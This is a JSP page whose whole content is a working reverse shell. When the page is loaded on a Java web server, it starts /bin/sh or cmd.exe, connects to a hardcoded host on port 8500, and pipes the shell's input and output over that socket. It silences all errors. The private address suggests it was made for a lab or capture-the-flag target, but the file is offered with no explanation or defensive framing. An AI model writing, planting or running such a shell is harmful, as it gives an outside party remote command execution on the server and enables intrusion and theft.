<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream tj;
    OutputStream mb;

    StreamConnector( InputStream tj, OutputStream mb )
    {
      this.tj = tj;
      this.mb = mb;
    }

    public void run()
    {
      BufferedReader pe  = null;
      BufferedWriter zks = null;
      try
      {
        pe  = new BufferedReader( new InputStreamReader( this.tj ) );
        zks = new BufferedWriter( new OutputStreamWriter( this.mb ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = pe.read( buffer, 0, buffer.length ) ) > 0 )
        {
          zks.write( buffer, 0, length );
          zks.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( pe != null )
          pe.close();
        if( zks != null )
          zks.close();
      } catch( Exception e ){}
    }
  }

  try
  {
    String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
  ShellPath = new String("/bin/sh");
} else {
  ShellPath = new String("cmd.exe");
}

    Socket socket = new Socket( "10.129.162.144", 8500 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>
